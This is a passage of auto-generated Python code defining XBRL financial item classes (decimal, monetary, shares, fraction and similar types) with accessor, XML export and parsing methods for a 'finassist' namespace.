obj_.original_tagname_ = 'periodOfPerformanceCurrentEndDate'
elif nodeName_ == 'periodOfPerformancePotentialEndDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformancePotentialEndDate = obj_
obj_.original_tagname_ = 'periodOfPerformancePotentialEndDate'
# end class periodOfPerformanceComplexType
class decimalItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if decimalItemType.subclass:
return decimalItemType.subclass(*args_, **kwargs_)
else:
return decimalItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='decimalItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='decimalItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='decimalItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='decimalItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='decimalItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class decimalItemType
class floatItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if floatItemType.subclass:
return floatItemType.subclass(*args_, **kwargs_)
else:
return floatItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='floatItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='floatItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='floatItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='floatItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='floatItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class floatItemType
class doubleItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if doubleItemType.subclass:
return doubleItemType.subclass(*args_, **kwargs_)
else:
return doubleItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='doubleItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='doubleItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='doubleItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='doubleItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='doubleItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class doubleItemType
class monetaryItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None, extensiontype_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if monetaryItemType.subclass:
return monetaryItemType.subclass(*args_, **kwargs_)
else:
return monetaryItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='monetaryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='monetaryItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='monetaryItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='monetaryItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='finassist:', name_='monetaryItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class monetaryItemType
class sharesItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if sharesItemType.subclass:
return sharesItemType.subclass(*args_, **kwargs_)
else:
return sharesItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='sharesItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='sharesItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='sharesItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='sharesItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='sharesItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class sharesItemType
class pureItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if pureItemType.subclass:
return pureItemType.subclass(*args_, **kwargs_)
else:
return pureItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='pureItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='pureItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='pureItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='pureItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='pureItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class pureItemType
class fractionItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, id=None, contextRef=None, numerator=None, denominator=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.numerator = numerator
self.denominator = denominator
def factory(*args_, **kwargs_):
if fractionItemType.subclass:
return fractionItemType.subclass(*args_, **kwargs_)
else:
return fractionItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_numerator(self): return self.numerator
def set_numerator(self, numerator): self.numerator = numerator
def get_denominator(self): return self.denominator
def set_denominator(self, denominator): self.denominator = denominator
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def hasContent_(self):
if (
self.numerator is not None or
self.denominator is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='fractionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='fractionItemType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='fractionItemType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='fractionItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='fractionItemType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.numerator is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%snumerator>%s</%snumerator>%s' % ('xbrli:', self.gds_format_string(quote_xml(self.numerator).encode(ExternalEncoding), input_name='numerator'), 'xbrli:', eol_))
if self.denominator is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdenominator>%s</%sdenominator>%s' % (namespace_, self.gds_format_float(self.denominator, input_name='denominator'), namespace_, eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'numerator':
numerator_ = child_.text
numerator_ = self.gds_validate_string(numerator_, node, 'numerator')
self.numerator = numerator_
elif nodeName_ == 'denominator':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'denominator')
self.denominator = fval_
# end class fractionItemType
class integerItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if integerItemType.subclass:
return integerItemType.subclass(*args_, **kwargs_)
else:
return integerItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='integerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='integerItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='integerItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='integerItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='integerItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
